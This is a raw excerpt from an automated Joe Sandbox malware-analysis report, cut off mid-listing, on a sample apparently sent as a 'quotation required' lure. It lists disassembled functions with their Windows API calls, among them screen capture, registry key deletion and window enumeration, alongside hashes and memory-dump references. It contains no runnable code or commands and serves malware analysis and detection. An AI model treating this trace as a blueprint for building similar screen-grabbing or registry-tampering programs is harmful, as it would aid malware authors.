                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                    • API String ID: 146587525-4033151799
                                                                                                                    • Opcode ID: 1988f5f07aba38e2512b696c4a092746529ad43678ecce1d2c044fe081908d87
                                                                                                                    • Instruction ID: 47c9103f6c652a056837ee1600acc4f7460a1bf8ac615f2ec68c183d3e6c0385
                                                                                                                    • Opcode Fuzzy Hash: 1988f5f07aba38e2512b696c4a092746529ad43678ecce1d2c044fe081908d87
                                                                                                                    • Instruction Fuzzy Hash: F7C1B130608201AFEB14DF14D994F2ABBE1FF84314F14855CF5598B2A2CB75EC86EB91
                                                                                                                    Function 00F9255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 00F925D8
                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00F925E8
                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00F925F4
                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00F92601
                                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00F9266D
                                                                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00F926AC
                                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00F926D0
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00F926D8
                                                                                                                    • DeleteObject.GDI32(?), ref: 00F926E1
                                                                                                                    • DeleteDC.GDI32(?), ref: 00F926E8
                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00F926F3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                    • Opcode ID: 93b2b95bc0343ce0438e261be0b4ea3c89541edefcc58d251ee708ecfb3ea9bd
                                                                                                                    • Instruction ID: 3c4fb677ca0d80825175077d6b9566ecd8918bc7780883f20fda1b975b90b2a0
                                                                                                                    • Opcode Fuzzy Hash: 93b2b95bc0343ce0438e261be0b4ea3c89541edefcc58d251ee708ecfb3ea9bd
                                                                                                                    • Instruction Fuzzy Hash: D161D1B5E00219EFDF05CFA4D884AAEBBB5FF48310F208529E955A7250E774A941DFA0
                                                                                                                    Function 00F4DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 00F4DAA1
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D659
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D66B
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D67D
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D68F
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D6A1
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D6B3
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D6C5
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D6D7
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D6E9
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D6FB
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D70D
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D71F
                                                                                                                      • Part of subcall function 00F4D63C: _free.LIBCMT ref: 00F4D731
                                                                                                                    • _free.LIBCMT ref: 00F4DA96
                                                                                                                      • Part of subcall function 00F429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000), ref: 00F429DE
                                                                                                                      • Part of subcall function 00F429C8: GetLastError.KERNEL32(00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000,00000000), ref: 00F429F0
                                                                                                                    • _free.LIBCMT ref: 00F4DAB8
                                                                                                                    • _free.LIBCMT ref: 00F4DACD
                                                                                                                    • _free.LIBCMT ref: 00F4DAD8
                                                                                                                    • _free.LIBCMT ref: 00F4DAFA
                                                                                                                    • _free.LIBCMT ref: 00F4DB0D
                                                                                                                    • _free.LIBCMT ref: 00F4DB1B
                                                                                                                    • _free.LIBCMT ref: 00F4DB26
                                                                                                                    • _free.LIBCMT ref: 00F4DB5E
                                                                                                                    • _free.LIBCMT ref: 00F4DB65
                                                                                                                    • _free.LIBCMT ref: 00F4DB82
                                                                                                                    • _free.LIBCMT ref: 00F4DB9A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 161543041-0
                                                                                                                    • Opcode ID: 98cb1cca28a579ec4e89b6ef746939aaa3ca7305ddcf4104131d6788a87851f0
                                                                                                                    • Instruction ID: 3586ab857309f4f7c1fc4e4ec15b1812f4078a282f56a6db7b615af6952802d6
                                                                                                                    • Opcode Fuzzy Hash: 98cb1cca28a579ec4e89b6ef746939aaa3ca7305ddcf4104131d6788a87851f0
                                                                                                                    • Instruction Fuzzy Hash: A7314C31A046059FEB61AA39EC45B567FE9FF40320F55442AF849D7292DB39AC40F720
                                                                                                                    Function 00F7365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F7369C
                                                                                                                    • _wcslen.LIBCMT ref: 00F736A7
                                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F73797
                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00F7380C
                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00F7385D
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00F73882
                                                                                                                    • GetParent.USER32(?), ref: 00F738A0
                                                                                                                    • ScreenToClient.USER32(00000000), ref: 00F738A7
                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F73921
                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00F7395D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                                    • String ID: %s%u
                                                                                                                    • API String ID: 4010501982-679674701
                                                                                                                    • Opcode ID: 5b31abe479d85b9d3c6f29eb3c1e498d7df95fc91c6f43f401aac517f5accc27
                                                                                                                    • Instruction ID: 5aba6cb1e8da2b7ea95e06d04d3097334557eb05928f02055ecc0d6331b60262
                                                                                                                    • Opcode Fuzzy Hash: 5b31abe479d85b9d3c6f29eb3c1e498d7df95fc91c6f43f401aac517f5accc27
                                                                                                                    • Instruction Fuzzy Hash: FA91B671604606BFD718DF24C885FAAB7A9FF44360F00C52AF99DD2190DB34EA45EB92
                                                                                                                    Function 00F74954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00F74994
                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00F749DA
                                                                                                                    • _wcslen.LIBCMT ref: 00F749EB
                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00F749F7
                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00F74A2C
                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00F74A64
                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00F74A9D
                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00F74AE6
                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00F74B20
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00F74B8B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                    • String ID: ThumbnailClass
                                                                                                                    • API String ID: 1311036022-1241985126
                                                                                                                    • Opcode ID: 887ff62c3b5ff38d3f23cdee06d0e9ca49daacddad7b730afafa49b2ce36e52d
                                                                                                                    • Instruction ID: 0880e17c5a7f4c028f3155a1708d3f008fa03360c9947a13c3ccfb27fbdb8c0f
                                                                                                                    • Opcode Fuzzy Hash: 887ff62c3b5ff38d3f23cdee06d0e9ca49daacddad7b730afafa49b2ce36e52d
                                                                                                                    • Instruction Fuzzy Hash: 0491B1714082059FDB05DF14C981FAA77E8FF84324F04846AFD899A196DB34FD45EBA2
                                                                                                                    Function 00FA8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FA8D5A
                                                                                                                    • GetFocus.USER32 ref: 00FA8D6A
                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00FA8D75
                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00FA8E1D
                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00FA8ECF
                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00FA8EEC
                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00FA8EFC
                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00FA8F2E
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00FA8F70
                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FA8FA1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1026556194-4108050209
                                                                                                                    • Opcode ID: 2fd408994034c72cc46a36480459196d520cfcb3f530d1da9124777319d48595
                                                                                                                    • Instruction ID: 42afa3136917475aa12328e2f702b8987ad22f2b7ac3855cbc9a448102c64540
                                                                                                                    • Opcode Fuzzy Hash: 2fd408994034c72cc46a36480459196d520cfcb3f530d1da9124777319d48595
                                                                                                                    • Instruction Fuzzy Hash: D881A4B19043059FDB10CF14DC84AAB7BE9FF8A3A4F14051DF98597291DBB4D902EBA1
                                                                                                                    Function 00F7DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F7DC20
                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F7DC46
                                                                                                                    • _wcslen.LIBCMT ref: 00F7DC50
                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00F7DCA0
                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F7DCBC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                    • API String ID: 1939486746-1459072770
                                                                                                                    • Opcode ID: 598da1636c74493b9407d0738e25ccbadbbebc60627cf4fc1373ab6896e5b182
                                                                                                                    • Instruction ID: 6b0ed2965f2e6405f05533485c59f8f3679a42ecbfec8e67d71d21a083cd9119
                                                                                                                    • Opcode Fuzzy Hash: 598da1636c74493b9407d0738e25ccbadbbebc60627cf4fc1373ab6896e5b182
                                                                                                                    • Instruction Fuzzy Hash: E14134729402157ADB15A770EC43EBF37BCEF42760F14406AF904E6182EB79E901B7A6
                                                                                                                    Function 00F9CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F9CC64
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00F9CC8D
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F9CD48
                                                                                                                      • Part of subcall function 00F9CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00F9CCAA
                                                                                                                      • Part of subcall function 00F9CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00F9CCBD
                                                                                                                      • Part of subcall function 00F9CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F9CCCF
                                                                                                                      • Part of subcall function 00F9CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F9CD05
                                                                                                                      • Part of subcall function 00F9CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F9CD28
                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F9CCF3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                    • API String ID: 2734957052-4033151799
                                                                                                                    • Opcode ID: b82069c6fdd9f5c61a31fbdb1b0740f6ad0c8fe68e6c6918f4445b93b8833f77
                                                                                                                    • Instruction ID: e8554f296e45f2a20230f9b58194ec5fe7f354c412c65bd1c687b791bb5f6e82
                                                                                                                    • Opcode Fuzzy Hash: b82069c6fdd9f5c61a31fbdb1b0740f6ad0c8fe68e6c6918f4445b93b8833f77
                                                                                                                    • Instruction Fuzzy Hash: CC317CB1E0112CBBEB219B51DC88EFFBB7CEF46754F000166E915E2240DA349A45BAE0
                                                                                                                    Function 00F83D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F83D40
                                                                                                                    • _wcslen.LIBCMT ref: 00F83D6D
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F83D9D
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F83DBE
                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00F83DCE
                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F83E55
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00F83E60
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00F83E6B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                    • API String ID: 1149970189-3457252023
                                                                                                                    • Opcode ID: 2aa84ec1d4ec72200868d37879f6a93b07a99ffa0ddbf0086382671babf27f1e
                                                                                                                    • Instruction ID: 483b35fc86122e7f95dc493a6c9c56d4d64b9fd2ddd0f1dae65efea304916fcf
                                                                                                                    • Opcode Fuzzy Hash: 2aa84ec1d4ec72200868d37879f6a93b07a99ffa0ddbf0086382671babf27f1e
                                                                                                                    • Instruction Fuzzy Hash: 0E31B4B290021DABDB21ABA0DC49FEF37BCEF89B10F1040B5F505D6160EB7497459B64
                                                                                                                    Function 00F7E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • timeGetTime.WINMM ref: 00F7E6B4
                                                                                                                      • Part of subcall function 00F2E551: timeGetTime.WINMM(?,?,00F7E6D4), ref: 00F2E555
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00F7E6E1
                                                                                                                    • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00F7E705
                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F7E727
                                                                                                                    • SetActiveWindow.USER32 ref: 00F7E746
                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F7E754
                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F7E773
                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00F7E77E
                                                                                                                    • IsWindow.USER32 ref: 00F7E78A
                                                                                                                    • EndDialog.USER32(00000000), ref: 00F7E79B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                    • String ID: BUTTON
                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                    • Opcode ID: f2763c31184d8c95fda7ce35813934990032b0447ea36d0cdf558e1d4b858ccb
                                                                                                                    • Instruction ID: 2c66ca367aed65fd7ec69a7dd8f94155daf91080069e576fc7531ff70edfed6a
                                                                                                                    • Opcode Fuzzy Hash: f2763c31184d8c95fda7ce35813934990032b0447ea36d0cdf558e1d4b858ccb
                                                                                                                    • Instruction Fuzzy Hash: 0C21A4B120024CAFEF005F24ECC9E253B6DF759358B148467F51D862B1EBB5AC00BA66
                                                                                                                    Function 00F7E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F7EA5D
                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F7EA73
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F7EA84
                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F7EA96
                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F7EAA7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$_wcslen
                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                    • API String ID: 2420728520-1007645807
                                                                                                                    • Opcode ID: 6bf895d6d081a24fc49851440b9e77828dbbf6678a83cd7247805dbbc7993ea3
                                                                                                                    • Instruction ID: ae21b7e5d1488ad26d033c179f5202062688c5dd07dc995aa7644f9405788e2a
                                                                                                                    • Opcode Fuzzy Hash: 6bf895d6d081a24fc49851440b9e77828dbbf6678a83cd7247805dbbc7993ea3
                                                                                                                    • Instruction Fuzzy Hash: 2B11A331A5021979E720A7A1DC5ADFF7B7CEBD5B10F44042BB811E20D0EEB45945E5B3
                                                                                                                    Function 00F75CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00F75CE2
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00F75CFB
                                                                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00F75D59
                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00F75D69
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00F75D7B
